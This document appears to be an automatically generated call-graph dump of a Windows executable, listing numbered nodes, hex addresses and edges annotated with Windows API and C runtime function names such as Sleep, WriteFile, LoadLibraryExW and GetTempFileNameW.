104339 84583c GetExitCodeProcess CloseHandle 104336->104339 104336->104349 104338 810d13 timeGetTime 104338->104349 104343 810f95 104339->104343 104340 810e5f Sleep 104348 810e70 Mailbox 104340->104348 104341 808047 59 API calls 104341->104349 104343->104270 104344 845af8 Sleep 104344->104348 104346 820db6 59 API calls Mailbox 104346->104349 104348->104343 104348->104349 104350 82049f timeGetTime 104348->104350 104354 845b8f GetExitCodeProcess 104348->104354 104356 80b7dd 109 API calls 104348->104356 104362 885f25 110 API calls 104348->104362 104363 845874 104348->104363 104364 845078 Sleep 104348->104364 104365 845c17 Sleep 104348->104365 104531 807667 104348->104531 104536 862408 60 API calls 104348->104536 104537 809e5d 60 API calls 104348->104537 104538 807de1 104348->104538 104542 8089b3 69 API calls Mailbox 104348->104542 104543 80b73c 331 API calls 104348->104543 104544 8564da 60 API calls 104348->104544 104545 865244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104348->104545 104546 863c55 66 API calls Mailbox 104348->104546 104349->104317 104349->104322 104349->104328 104349->104333 104349->104334 104349->104335 104349->104336 104349->104338 104349->104340 104349->104341 104349->104343 104349->104344 104349->104346 104349->104348 104351 810f4e timeGetTime 104349->104351 104360 80b73c 304 API calls 104349->104360 104371 809e5d 60 API calls 104349->104371 104372 809ea0 304 API calls 104349->104372 104375 80fce0 304 API calls 104349->104375 104378 807de1 59 API calls 104349->104378 104379 869e4a 89 API calls 104349->104379 104381 8084c0 69 API calls 104349->104381 104382 809c90 59 API calls Mailbox 104349->104382 104384 8089b3 69 API calls 104349->104384 104385 8455d5 VariantClear 104349->104385 104386 85617e 59 API calls Mailbox 104349->104386 104387 84566b VariantClear 104349->104387 104388 808cd4 59 API calls Mailbox 104349->104388 104389 845419 VariantClear 104349->104389 104390 856e8f 59 API calls 104349->104390 104445 80e6a0 104349->104445 104476 80f460 104349->104476 104495 8031ce 104349->104495 104500 80e420 331 API calls 104349->104500 104507 886018 59 API calls 104349->104507 104508 869a15 59 API calls Mailbox 104349->104508 104509 85d4f2 59 API calls 104349->104509 104510 809837 104349->104510 104528 8560ef 59 API calls 2 library calls 104349->104528 104529 808401 59 API calls 104349->104529 104530 8082df 59 API calls Mailbox 104349->104530 104350->104348 104503 809e5d 60 API calls 104351->104503 104357 845ba5 WaitForSingleObject 104354->104357 104358 845bbb CloseHandle 104354->104358 104356->104348 104357->104349 104357->104358 104358->104348 104360->104349 104362->104348 104363->104343 104364->104349 104365->104349 104371->104349 104372->104349 104375->104349 104378->104349 104379->104349 104381->104349 104382->104349 104384->104349 104385->104349 104386->104349 104387->104349 104388->104349 104389->104349 104390->104349 104391->104287 104392->104259 104393->104263 104394->104263 104396 809ebf 104395->104396 104414 809eed Mailbox 104395->104414 104397 820db6 Mailbox 59 API calls 104396->104397 104397->104414 104398 80b475 104399 808047 59 API calls 104398->104399 104413 80a057 104399->104413 104400 80b47a 104401 840055 104400->104401 104417 8409e5 104400->104417 105702 869e4a 89 API calls 4 library calls 104401->105702 104402 820db6 59 API calls Mailbox 104402->104414 104406 822d40 67 API calls __cinit 104406->104414 104407 840064 104407->104256 104408 808047 59 API calls 104408->104414 104411 807667 59 API calls 104411->104414 104412 856e8f 59 API calls 104412->104414 104413->104256 104414->104398 104414->104400 104414->104401 104414->104402 104414->104406 104414->104408 104414->104411 104414->104412 104414->104413 104415 8409d6 104414->104415 104418 80a55a 104414->104418 105700 80c8c0 331 API calls 2 library calls 104414->105700 105701 80b900 60 API calls Mailbox 104414->105701 105704 869e4a 89 API calls 4 library calls 104415->105704 105705 869e4a 89 API calls 4 library calls 104417->105705 105703 869e4a 89 API calls 4 library calls 104418->105703 104419->104259 104420->104217 104421->104272 104422->104226 104423->104272 104424->104272 104425->104229 104426->104238 104427->104239 104428->104239 104429->104242 104430->104246 104431->104263 104432->104263 104433->104263 104434->104263 104436 8084cb 104435->104436 104438 8084f2 104436->104438 105706 8089b3 69 API calls Mailbox 104436->105706 104438->104271 104439->104272 104440->104255 104441->104222 104442->104272 104443->104305 104444->104312 104446 80e6d5 104445->104446 104447 843aa9 104446->104447 104450 80e73f 104446->104450 104460 80e799 104446->104460 104448 809ea0 331 API calls 104447->104448 104449 843abe 104448->104449 104475 80e970 Mailbox 104449->104475 104548 869e4a 89 API calls 4 library calls 104449->104548 104453 807667 59 API calls 104450->104453 104450->104460 104451 807667 59 API calls 104451->104460 104455 843b04 104453->104455 104454 822d40 __cinit 67 API calls 104454->104460 104549 822d40 104455->104549 104456 843b26 104456->104349 104458 8084c0 69 API calls 104458->104475 104459 809ea0 331 API calls 104459->104475 104460->104451 104460->104454 104460->104456 104461 80e95a 104460->104461 104460->104475 104461->104475 104552 869e4a 89 API calls 4 library calls 104461->104552 104462 869e4a 89 API calls 104462->104475 104464 808d40 59 API calls 104464->104475 104472 843e25 104472->104349 104473 80f195 104556 869e4a 89 API calls 4 library calls 104473->104556 104474 80ea78 104474->104349 104475->104458 104475->104459 104475->104462 104475->104464 104475->104473 104475->104474 104547 807f77 59 API calls 2 library calls 104475->104547 104553 856e8f 59 API calls 104475->104553 104554 87c5c3 331 API calls 104475->104554 104555 87b53c 331 API calls Mailbox 104475->104555 104557 809c90 59 API calls Mailbox 104475->104557 104558 8793c6 331 API calls Mailbox 104475->104558 104477 80f650 104476->104477 104478 80f4ba 104476->104478 104480 807de1 59 API calls 104477->104480 104479 84441e 104478->104479 104481 80f4c6 104478->104481 104737 87bc6b 331 API calls Mailbox 104479->104737 104487 80f58c Mailbox 104480->104487 104735 80f290 331 API calls 2 library calls 104481->104735 104484 84442c 104488 80f630 104484->104488 104738 869e4a 89 API calls 4 library calls 104484->104738 104486 80f4fd 104486->104484 104486->104487 104486->104488 104637 863c37 104487->104637 104640 804e4a 104487->104640 104646 87445a 104487->104646 104655 86cb7a 104487->104655 104488->104349 104490 80f5e3 104490->104488 104736 809c90 59 API calls Mailbox 104490->104736 104496 803212 104495->104496 104497 8031e0 104495->104497 104496->104349 104497->104496 104498 803205 IsDialogMessageW 104497->104498 104499 83cf32 GetClassLongW 104497->104499 104498->104496 104498->104497 104499->104497 104499->104498 104500->104349 104501->104321 104502->104326 104503->104349 104504->104327 104505->104327 104506->104327 104507->104349 104508->104349 104509->104349 104511 809851 104510->104511 104520 80984b 104510->104520 104512 83f5d3 __i64tow 104511->104512 104513 809899 104511->104513 104515 809857 __itow 104511->104515 104518 83f4da 104511->104518 105698 823698 83 API calls 3 library calls 104513->105698 104517 820db6 Mailbox 59 API calls 104515->104517 104519 809871 104517->104519 104521 820db6 Mailbox 59 API calls 104518->104521 104526 83f552 Mailbox _wcscpy 104518->104526 104519->104520 104522 807de1 59 API calls 104519->104522 104520->104349 104523 83f51f 104521->104523 104522->104520 104524 820db6 Mailbox 59 API calls 104523->104524 104525 83f545 104524->104525 104525->104526 104527 807de1 59 API calls 104525->104527 105699 823698 83 API calls 3 library calls 104526->105699 104527->104526 104528->104349 104529->104349 104530->104349 104532 820db6 Mailbox 59 API calls 104531->104532 104533 807688 104532->104533 104534 820db6 Mailbox 59 API calls 104533->104534 104535 807696 104534->104535 104535->104348 104536->104348 104537->104348 104539 807df0 __wsetenvp _memmove 104538->104539 104540 820db6 Mailbox 59 API calls 104539->104540 104541 807e2e 104540->104541 104541->104348 104542->104348 104543->104348 104544->104348 104545->104348 104546->104348 104547->104475 104548->104475 104559 822c44 104549->104559 104551 822d4b 104551->104460 104552->104475 104553->104475 104554->104475 104555->104475 104556->104472 104557->104475 104558->104475 104560 822c50 __commit 104559->104560 104567 823217 104560->104567 104566 822c77 __commit 104566->104551 104584 829c0b 104567->104584 104569 822c59 104570 822c88 DecodePointer DecodePointer 104569->104570 104571 822c65 104570->104571 104572 822cb5 104570->104572 104581 822c82 104571->104581 104572->104571 104630 8287a4 59 API calls __commit 104572->104630 104574 822cc7 104575 822d18 EncodePointer EncodePointer 104574->104575 104576 822cec 104574->104576 104631 828864 61 API calls 2 library calls 104574->104631 104575->104571 104576->104571 104579 822d06 EncodePointer 104576->104579 104632 828864 61 API calls 2 library calls 104576->104632 104579->104575 104580 822d00 104580->104571 104580->104579 104633 823220 104581->104633 104585 829c2f EnterCriticalSection 104584->104585 104586 829c1c 104584->104586 104585->104569 104591 829c93 104586->104591 104588 829c22 104588->104585 104615 8230b5 58 API calls 3 library calls 104588->104615 104592 829c9f __commit 104591->104592 104593 829cc0 104592->104593 104594 829ca8 104592->104594 104603 829ce1 __commit 104593->104603 104619 82881d 58 API calls 2 library calls 104593->104619 104616 82a16b 58 API calls 2 library calls 104594->104616 104597 829cad 104617 82a1c8 58 API calls 8 library calls 104597->104617 104598 829cd5 104601 829ceb 104598->104601 104602 829cdc 104598->104602 104600 829cb4 104618 82309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104600->104618 104606 829c0b __lock 58 API calls 104601->104606 104620 828b28 58 API calls __getptd_noexit 104602->104620 104603->104588 104608 829cf2 104606->104608 104609 829d17 104608->104609 104610 829cff 104608->104610 104622 822d55 104609->104622 104621 829e2b InitializeCriticalSectionAndSpinCount 104610->104621 104613 829d0b 104628 829d33 LeaveCriticalSection _doexit 104613->104628 104616->104597 104617->104600 104619->104598 104620->104603 104621->104613 104623 822d87 _free 104622->104623 104624 822d5e RtlFreeHeap 104622->104624 104623->104613 104624->104623 104625 822d73 104624->104625 104629 828b28 58 API calls __getptd_noexit 104625->104629 104627 822d79 GetLastError 104627->104623 104628->104603 104629->104627 104630->104574 104631->104576 104632->104580 104636 829d75 LeaveCriticalSection 104633->104636 104635 822c87 104635->104566 104636->104635 104739 86445a GetFileAttributesW 104637->104739 104641 804e54 104640->104641 104642 804e5b 104640->104642 104743 8253a6 104641->104743 104644 804e6a 104642->104644 104645 804e7b FreeLibrary 104642->104645 104644->104490 104645->104644 104647 809837 84 API calls 104646->104647 104648 874494 104647->104648 105013 806240 104648->105013 104650 8744a4 104651 8744c9 104650->104651 104652 809ea0 331 API calls 104650->104652 104654 8744cd 104651->104654 105038 809a98 59 API calls Mailbox 104651->105038 104652->104651 104654->104490 104656 807667 59 API calls 104655->104656 104657 86cbaf 104656->104657 104658 807667 59 API calls 104657->104658 104659 86cbb8 104658->104659 104660 86cbcc 104659->104660 105240 809b3c 59 API calls 104659->105240 104662 809837 84 API calls 104660->104662 104663 86cbe9 104662->104663 104664 86ccea 104663->104664 104665 86cc0b 104663->104665 104677 86cd1a Mailbox 104663->104677 105053 804ddd 104664->105053 104666 809837 84 API calls 104665->104666 104668 86cc17 104666->104668 104670 808047 59 API calls 104668->104670 104673 86cc23 104670->104673 104671 86cd16 104672 807667 59 API calls 104671->104672 104671->104677 104675 86cd4b 104672->104675 104679 86cc37 104673->104679 104680 86cc69 104673->104680 104674 804ddd 136 API calls 104674->104671 104676 807667 59 API calls 104675->104676 104678 86cd54 104676->104678 104677->104490 104682 807667 59 API calls 104678->104682 104683 808047 59 API calls 104679->104683 104681 809837 84 API calls 104680->104681 104684 86cc76 104681->104684 104685 86cd5d 104682->104685 104686 86cc47 104683->104686 104688 808047 59 API calls 104684->104688 104689 807667 59 API calls 104685->104689 104687 807cab 59 API calls 104686->104687 104690 86cc51 104687->104690 104691 86cc82 104688->104691 104692 86cd66 104689->104692 104693 809837 84 API calls 104690->104693 105241 864a31 GetFileAttributesW 104691->105241 104695 809837 84 API calls 104692->104695 104696 86cc5d 104693->104696 104698 86cd73 104695->104698 104699 807b2e 59 API calls 104696->104699 104697 86cc8b 104702 8079f2 59 API calls 104697->104702 104706 86cc9e 104697->104706 105077 80459b 104698->105077 104699->104680 104701 809837 84 API calls 104705 86cccb 104701->104705 104702->104706 104703 86cd8e 105128 8079f2 104703->105128 105242 8637ef 75 API calls Mailbox 104705->105242 104706->104701 104710 86cca4 104706->104710 104709 86cdd1 104712 808047 59 API calls 104709->104712 104710->104677 104711 8079f2 59 API calls 104713 86cdae 104711->104713 104714 86cddf 104712->104714 104713->104709 104716 807bcc 59 API calls 104713->104716 104715 807b2e 59 API calls 104714->104715 104717 86cded 104715->104717 104718 86cdc3 104716->104718 104719 807b2e 59 API calls 104717->104719 104720 807bcc 59 API calls 104718->104720 104721 86cdfb 104719->104721 104720->104709 104722 807b2e 59 API calls 104721->104722 104723 86ce09 104722->104723 104724 809837 84 API calls 104723->104724 104725 86ce15 104724->104725 105131 864071 104725->105131 104727 86ce26 104728 863c37 3 API calls 104727->104728 104729 86ce30 104728->104729 104730 809837 84 API calls 104729->104730 104734 86ce61 104729->104734 104731 86ce4e 104730->104731 105185 869155 104731->105185 104733 804e4a 84 API calls 104733->104677 104734->104733 104735->104486 104736->104490 104737->104484 104738->104488 104740 863c3e 104739->104740 104741 864475 FindFirstFileW 104739->104741 104740->104490 104741->104740 104742 86448a FindClose 104741->104742 104742->104740 104744 8253b2 __commit 104743->104744 104745 8253c6 104744->104745 104747 8253de 104744->104747 104778 828b28 58 API calls __getptd_noexit 104745->104778 104752 8253d6 __commit 104747->104752 104756 826c11 104747->104756 104748 8253cb 104779 828db6 9 API calls __commit 104748->104779 104752->104642 104757 826c43 EnterCriticalSection 104756->104757 104758 826c21 104756->104758 104760 8253f0 104757->104760 104758->104757 104759 826c29 104758->104759 104761 829c0b __lock 58 API calls 104759->104761 104762 82533a 104760->104762 104761->104760 104763 825349 104762->104763 104764 82535d 104762->104764 104824 828b28 58 API calls __getptd_noexit 104763->104824 104766 825359 104764->104766 104781 824a3d 104764->104781 104780 825415 LeaveCriticalSection LeaveCriticalSection __wfsopen 104766->104780 104767 82534e 104825 828db6 9 API calls __commit 104767->104825 104774 825377 104798 830a02 104774->104798 104776 82537d 104776->104766 104777 822d55 _free 58 API calls 104776->104777 104777->104766 104778->104748 104779->104752 104780->104752 104782 824a50 104781->104782 104786 824a74 104781->104786 104783 8246e6 _fprintf 58 API calls 104782->104783 104782->104786 104784 824a6d 104783->104784 104826 82d886 104784->104826 104787 830b77 104786->104787 104788 825371 104787->104788 104789 830b84 104787->104789 104791 8246e6 104788->104791 104789->104788 104790 822d55 _free 58 API calls 104789->104790 104790->104788 104792 8246f0 104791->104792 104793 824705 104791->104793 104968 828b28 58 API calls __getptd_noexit 104792->104968 104793->104774 104795 8246f5 104969 828db6 9 API calls __commit 104795->104969 104797 824700 104797->104774 104799 830a0e __commit 104798->104799 104800 830a32 104799->104800 104801 830a1b 104799->104801 104803 830abd 104800->104803 104805 830a42 104800->104805 104985 828af4 58 API calls __getptd_noexit 104801->104985 104990 828af4 58 API calls __getptd_noexit 104803->104990 104804 830a20 104986 828b28 58 API calls __getptd_noexit 104804->104986 104808 830a60 104805->104808 104809 830a6a 104805->104809 104987 828af4 58 API calls __getptd_noexit 104808->104987 104811 82d206 ___lock_fhandle 59 API calls 104809->104811 104810 830a65 104991 828b28 58 API calls __getptd_noexit 104810->104991 104814 830a70 104811->104814 104812 830a27 __commit 104812->104776 104817 830a83 104814->104817 104818 830a8e 104814->104818 104816 830ac9 104992 828db6 9 API calls __commit 104816->104992 104970 830add 104817->104970 104988 828b28 58 API calls __getptd_noexit 104818->104988 104822 830a89 104989 830ab5 LeaveCriticalSection __unlock_fhandle 104822->104989 104824->104767 104825->104766 104827 82d892 __commit 104826->104827 104828 82d8b6 104827->104828 104829 82d89f 104827->104829 104830 82d955 104828->104830 104832 82d8ca 104828->104832 104927 828af4 58 API calls __getptd_noexit 104829->104927 104933 828af4 58 API calls __getptd_noexit 104830->104933 104835 82d8f2 104832->104835 104836 82d8e8 104832->104836 104834 82d8a4 104928 828b28 58 API calls __getptd_noexit 104834->104928 104854 82d206 104835->104854 104929 828af4 58 API calls __getptd_noexit 104836->104929 104837 82d8ed 104934 828b28 58 API calls __getptd_noexit 104837->104934 104839 82d8ab __commit 104839->104786 104842 82d8f8 104844 82d90b 104842->104844 104845 82d91e 104842->104845 104863 82d975 104844->104863 104930 828b28 58 API calls __getptd_noexit 104845->104930 104846 82d961 104935 828db6 9 API calls __commit 104846->104935 104850 82d917 104932 82d94d LeaveCriticalSection __unlock_fhandle 104850->104932 104851 82d923 104931 828af4 58 API calls __getptd_noexit 104851->104931 104855 82d212 __commit 104854->104855 104856 82d261 EnterCriticalSection 104855->104856 104857 829c0b __lock 58 API calls 104855->104857 104858 82d287 __commit 104856->104858 104859 82d237 104857->104859 104858->104842 104860 82d24f 104859->104860 104936 829e2b InitializeCriticalSectionAndSpinCount 104859->104936 104937 82d28b LeaveCriticalSection _doexit 104860->104937 104864 82d982 __write_nolock 104863->104864 104865 82d9e0 104864->104865 104866 82d9c1 104864->104866 104895 82d9b6 104864->104895 104869 82da38 104865->104869 104870 82da1c 104865->104870 104947 828af4 58 API calls __getptd_noexit 104866->104947 104874 82da51 104869->104874 104953 8318c1 60 API calls 2 library calls 104869->104953 104950 828af4 58 API calls __getptd_noexit 104870->104950 104871 82e1d6 104871->104850 104872 82d9c6 104948 828b28 58 API calls __getptd_noexit 104872->104948 104938 835c6b 104874->104938 104877 82da21 104951 828b28 58 API calls __getptd_noexit 104877->104951 104879 82d9cd 104949 828db6 9 API calls __commit 104879->104949 104880 82da5f 104883 82ddb8 104880->104883 104954 8299ac 58 API calls 2 library calls 104880->104954 104885 82ddd6 104883->104885 104886 82e14b WriteFile 104883->104886 104884 82da28 104952 828db6 9 API calls __commit 104884->104952 104889 82defa 104885->104889 104897 82ddec 104885->104897 104890 82ddab GetLastError 104886->104890 104894 82dd78 104886->104894 104902 82dfef 104889->104902 104904 82df05 104889->104904 104890->104894 104891 82da8b GetConsoleMode 104891->104883 104893 82daca 104891->104893 104892 82e184 104892->104895 104959 828b28 58 API calls __getptd_noexit 104892->104959 104893->104883 104896 82dada GetConsoleCP 104893->104896 104894->104892 104894->104895 104901 82ded8 104894->104901 104961 82c5f6 104895->104961 104896->104892 104924 82db09 104896->104924 104897->104892 104898 82de5b WriteFile 104897->104898 104898->104890 104903 82de98 104898->104903 104900 82e1b2 104960 828af4 58 API calls __getptd_noexit 104900->104960 104906 82dee3 104901->104906 104907 82e17b 104901->104907 104902->104892 104908 82e064 WideCharToMultiByte 104902->104908 104903->104897 104920 82debc 104903->104920 104904->104892 104909 82df6a WriteFile 104904->104909 104956 828b28 58 API calls __getptd_noexit 104906->104956 104958 828b07 58 API calls 2 library calls 104907->104958 104908->104890 104918 82e0ab 104908->104918 104909->104890 104910 82dfb9 104909->104910 104910->104894 104910->104904 104910->104920 104913 82dee8 104957 828af4 58 API calls __getptd_noexit 104913->104957 104914 82e0b3 WriteFile 104917 82e106 GetLastError 104914->104917 104914->104918 104917->104918 104918->104894 104918->104902 104918->104914 104918->104920 104919 837a5e WriteConsoleW CreateFileW __putwch_nolock 104926 82dc5f 104919->104926 104920->104894 104921 8362ba 60 API calls __write_nolock 104921->104924 104922 82dbf2 WideCharToMultiByte 104922->104894 104923 82dc2d WriteFile 104922->104923 104923->104890 104923->104926 104924->104894 104924->104921 104924->104922 104924->104926 104955 8235f5 58 API calls __isleadbyte_l 104924->104955 104925 82dc87 WriteFile 104925->104890 104925->104926 104926->104890 104926->104894 104926->104919 104926->104924 104926->104925 104927->104834 104928->104839 104929->104837 104930->104851 104931->104850 104932->104839 104933->104837 104934->104846 104935->104839 104936->104860 104937->104856 104939 835c83 104938->104939 104940 835c76 104938->104940 104942 835c8f 104939->104942 104943 828b28 __commit 58 API calls 104939->104943 104941 828b28 __commit 58 API calls 104940->104941 104944 835c7b 104941->104944 104942->104880 104945 835cb0 104943->104945 104944->104880 104946 828db6 __commit 9 API calls 104945->104946 104946->104944 104947->104872 104948->104879 104949->104895 104950->104877 104951->104884 104952->104895 104953->104874 104954->104891 104955->104924 104956->104913 104957->104895 104958->104895 104959->104900 104960->104895 104962 82c600 IsProcessorFeaturePresent 104961->104962 104963 82c5fe 104961->104963 104965 83590a 104962->104965 104963->104871 104966 8358b9 ___raise_securityfailure 5 API calls 104965->104966 104967 8359ed 104966->104967 104967->104871 104968->104795 104969->104797 104993 82d4c3 104970->104993 104972 830aeb 104973 830b41 104972->104973 104974 830b1f 104972->104974 104977 82d4c3 __commit 58 API calls 104972->104977 105006 82d43d 59 API calls __commit 104973->105006 104974->104973 104978 82d4c3 __commit 58 API calls 104974->104978 104976 830b49 104979 830b6b 104976->104979 105007 828b07 58 API calls 2 library calls 104976->105007 104980 830b16 104977->104980 104981 830b2b CloseHandle 104978->104981 104979->104822 104983 82d4c3 __commit 58 API calls 104980->104983 104981->104973 104984 830b37 GetLastError 104981->104984 104983->104974 104984->104973 104985->104804 104986->104812 104987->104810 104988->104822 104989->104812 104990->104810 104991->104816 104992->104812 104994 82d4e3 104993->104994 104995 82d4ce 104993->104995 105000 82d508 104994->105000 105010 828af4 58 API calls __getptd_noexit 104994->105010 105008 828af4 58 API calls __getptd_noexit 104995->105008 104997 82d4d3 105009 828b28 58 API calls __getptd_noexit 104997->105009 105000->104972 105001 82d512 105011 828b28 58 API calls __getptd_noexit 105001->105011 105002 82d4db 105002->104972 105004 82d51a 105012 828db6 9 API calls __commit 105004->105012 105006->104976 105007->104979 105008->104997 105009->105002 105010->105001 105011->105004 105012->105002 105014 807a16 59 API calls 105013->105014 105031 806265 105014->105031 105015 80646a 105041 80750f 105015->105041 105017 806484 Mailbox 105017->104650 105020 83dff6 105051 85f8aa 91 API calls 4 library calls 105020->105051 105021 80750f 59 API calls 105021->105031 105025 807d8c 59 API calls 105025->105031 105026 83e004 105027 80750f 59 API calls 105026->105027 105029 83e01a 105027->105029 105028 806799 _memmove 105052 85f8aa 91 API calls 4 library calls 105028->105052 105029->105017 105030 83df92 105032 808029 59 API calls 105030->105032 105031->105015 105031->105020 105031->105021 105031->105025 105031->105028 105031->105030 105035 807e4f 59 API calls 105031->105035 105039 805f6c 60 API calls 105031->105039 105040 805d41 59 API calls Mailbox 105031->105040 105049 805e72 60 API calls 105031->105049 105050 807924 59 API calls 2 library calls 105031->105050 105034 83df9d 105032->105034 105037 820db6 Mailbox 59 API calls 105034->105037 105036 80643b CharUpperBuffW 105035->105036 105036->105031 105037->105028 105038->104654 105039->105031 105040->105031 105042 8075af 105041->105042 105045 807522 _memmove 105041->105045 105044 820db6 Mailbox 59 API calls 105042->105044 105043 820db6 Mailbox 59 API calls 105046 807529 105043->105046 105044->105045 105045->105043 105047 820db6 Mailbox 59 API calls 105046->105047 105048 807552 105046->105048 105047->105048 105048->105017 105049->105031 105050->105031 105051->105026 105052->105017 105243 804bb5 105053->105243 105058 83d8e6 105060 804e4a 84 API calls 105058->105060 105059 804e08 LoadLibraryExW 105253 804b6a 105059->105253 105062 83d8ed 105060->105062 105064 804b6a 3 API calls 105062->105064 105066 83d8f5 105064->105066 105279 804f0b 105066->105279 105067 804e2f 105067->105066 105068 804e3b 105067->105068 105070 804e4a 84 API calls 105068->105070 105072 804e40 105070->105072 105072->104671 105072->104674 105074 83d91c 105287 804ec7 105074->105287 105078 807667 59 API calls 105077->105078 105079 8045b1 105078->105079 105080 807667 59 API calls 105079->105080 105081 8045b9 105080->105081 105082 807667 59 API calls 105081->105082 105083 8045c1 105082->105083 105084 807667 59 API calls 105083->105084 105085 8045c9 105084->105085 105086 83d4d2 105085->105086 105087 8045fd 105085->105087 105088 808047 59 API calls 105086->105088 105089 80784b 59 API calls 105087->105089 105090 83d4db 105088->105090 105091 80460b 105089->105091 105574 807d8c 105090->105574 105093 807d2c 59 API calls 105091->105093 105094 804615 105093->105094 105095 804640 105094->105095 105096 80784b 59 API calls 105094->105096 105098 80465f 105095->105098 105111 83d4fb 105095->105111 105113 804680 105095->105113 105099 804636 105096->105099 105100 8079f2 59 API calls 105098->105100 105103 807d2c 59 API calls 105099->105103 105104 804669 105100->105104 105101 804691 105105 8046a3 105101->105105 105107 808047 59 API calls 105101->105107 105102 83d5cb 105106 807bcc 59 API calls 105102->105106 105103->105095 105109 80784b 59 API calls 105104->105109 105104->105113 105108 8046b3 105105->105108 105110 808047 59 API calls 105105->105110 105123 83d588 105106->105123 105107->105105 105112 8046ba 105108->105112 105115 808047 59 API calls 105108->105115 105109->105113 105110->105108 105111->105102 105114 83d5b4 105111->105114 105122 83d532 105111->105122 105116 808047 59 API calls 105112->105116 105125 8046c1 Mailbox 105112->105125 105561 80784b 105113->105561 105114->105102 105119 83d59f 105114->105119 105115->105112 105116->105125 105117 8079f2 59 API calls 105117->105123 105118 83d590 105120 807bcc 59 API calls 105118->105120 105121 807bcc 59 API calls 105119->105121 105120->105123 105121->105123 105122->105118 105126 83d57b 105122->105126 105123->105113 105123->105117 105578 807924 59 API calls 2 library calls 105123->105578 105125->104703 105127 807bcc 59 API calls 105126->105127 105127->105123 105129 807e4f 59 API calls 105128->105129 105130 8079fd 105129->105130 105130->104709 105130->104711 105132 86408d 105131->105132 105133 864092 105132->105133 105134 8640a0 105132->105134 105136 808047 59 API calls 105133->105136 105135 807667 59 API calls 105134->105135 105138 8640a8 105135->105138 105137 86409b Mailbox 105136->105137 105137->104727 105139 807667 59 API calls 105138->105139 105140 8640b0 105139->105140 105141 807667 59 API calls 105140->105141 105142 8640bb 105141->105142 105143 807667 59 API calls 105142->105143 105144 8640c3 105143->105144 105145 807667 59 API calls 105144->105145 105146 8640cb 105145->105146 105147 807667 59 API calls 105146->105147 105148 8640d3 105147->105148 105149 807667 59 API calls 105148->105149 105150 8640db 105149->105150 105151 807667 59 API calls 105150->105151 105152 8640e3 105151->105152 105153 80459b 59 API calls 105152->105153 105154 8640fa 105153->105154 105155 80459b 59 API calls 105154->105155 105156 864113 105155->105156 105157 8079f2 59 API calls 105156->105157 105158 86411f 105157->105158 105159 864132 105158->105159 105160 807d2c 59 API calls 105158->105160 105161 8079f2 59 API calls 105159->105161 105160->105159 105162 86413b 105161->105162 105163 86414b 105162->105163 105165 807d2c 59 API calls 105162->105165 105164 808047 59 API calls 105163->105164 105166 864157 105164->105166 105165->105163 105167 807b2e 59 API calls 105166->105167 105168 864163 105167->105168 105580 864223 59 API calls 105168->105580 105170 864172 105581 864223 59 API calls 105170->105581 105172 864185 105173 8079f2 59 API calls 105172->105173 105174 86418f 105173->105174 105175 8641a6 105174->105175 105176 864194 105174->105176 105178 8079f2 59 API calls 105175->105178 105177 807cab 59 API calls 105176->105177 105179 8641a1 105177->105179 105180 8641af 105178->105180 105183 807b2e 59 API calls 105179->105183 105181 8641cd 105180->105181 105182 807cab 59 API calls 105180->105182 105184 807b2e 59 API calls 105181->105184 105182->105179 105183->105181 105184->105137 105186 869162 __write_nolock 105185->105186 105187 820db6 Mailbox 59 API calls 105186->105187 105188 8691bf 105187->105188 105189 80522e 59 API calls 105188->105189 105190 8691c9 105189->105190 105191 868f5f GetSystemTimeAsFileTime 105190->105191 105192 8691d4 105191->105192 105193 804ee5 85 API calls 105192->105193 105194 8691e7 _wcscmp 105193->105194 105195 86920b 105194->105195 105196 8692b8 105194->105196 105599 869734 105195->105599 105198 869734 96 API calls 105196->105198 105213 869284 _wcscat 105198->105213 105201 804f0b 74 API calls 105203 8692dd 105201->105203 105202 8692c1 105202->104734 105204 804f0b 74 API calls 105203->105204 105206 8692ed 105204->105206 105205 869239 _wcscat _wcscpy 105606 8240fb 58 API calls __wsplitpath_helper 105205->105606 105207 804f0b 74 API calls 105206->105207 105209 869308 105207->105209 105210 804f0b 74 API calls 105209->105210 105211 869318 105210->105211 105212 804f0b 74 API calls 105211->105212 105214 869333 105212->105214 105213->105201 105213->105202 105215 804f0b 74 API calls 105214->105215 105216 869343 105215->105216 105217 804f0b 74 API calls 105216->105217 105218 869353 105217->105218 105219 804f0b 74 API calls 105218->105219 105220 869363 105219->105220 105582 8698e3 GetTempPathW GetTempFileNameW 105220->105582 105222 86936f 105223 82525b 115 API calls 105222->105223 105234 869380 105223->105234 105224 86943a 105225 8253a6 __fcloseall 83 API calls 105224->105225 105226 869445 105225->105226 105228 86945f 105226->105228 105229 86944b DeleteFileW 105226->105229 105227 804f0b 74 API calls 105227->105234 105229->105202 105234->105202 105234->105224 105234->105227 105583 824863 105234->105583 105240->104660 105241->104697 105242->104710 105292 804c03 105243->105292 105246 804bf5 105250 82525b 105246->105250 105247 804bec FreeLibrary 105247->105246 105248 804c03 2 API calls 105249 804bdc 105248->105249 105249->105246 105249->105247 105296 825270 105250->105296 105252 804dfc 105252->105058 105252->105059 105377 804c36 105253->105377 105256 804b8f 105257 804ba1 FreeLibrary 105256->105257 105258 804baa 105256->105258 105257->105258 105260 804c70 105258->105260 105259 804c36 2 API calls 105259->105256 105261 820db6 Mailbox 59 API calls 105260->105261 105262 804c85 105261->105262 105381 80522e 105262->105381 105264 804c91 _memmove 105265 804ccc 105264->105265 105266 804dc1 105264->105266 105267 804d89 105264->105267 105268 804ec7 69 API calls 105265->105268 105395 86991b 95 API calls 105266->105395 105384 804e89 CreateStreamOnHGlobal 105267->105384 105276 804cd5 105268->105276 105271 804f0b 74 API calls 105271->105276 105272 804d69 105272->105067 105274 83d8a7 105275 804ee5 85 API calls 105274->105275 105277 83d8bb 105275->105277 105276->105271 105276->105272 105276->105274 105390 804ee5 105276->105390 105278 804f0b 74 API calls 105277->105278 105278->105272 105280 804f1d 105279->105280 105281 83d9cd 105279->105281 105413 8255e2 105280->105413 105284 869109 105538 868f5f 105284->105538 105286 86911f 105286->105074 105288 83d990 105287->105288 105289 804ed6 105287->105289 105543 825c60 105289->105543 105291 804ede 105293 804bd0 105292->105293 105294 804c0c LoadLibraryA 105292->105294 105293->105248 105293->105249 105294->105293 105295 804c1d GetProcAddress 105294->105295 105295->105293 105299 82527c __commit 105296->105299 105297 82528f 105345 828b28 58 API calls __getptd_noexit 105297->105345 105299->105297 105301 8252c0 105299->105301 105300 825294 105346 828db6 9 API calls __commit 105300->105346 105315 8304e8 105301->105315 105304 8252c5 105305 8252db 105304->105305 105306 8252ce 105304->105306 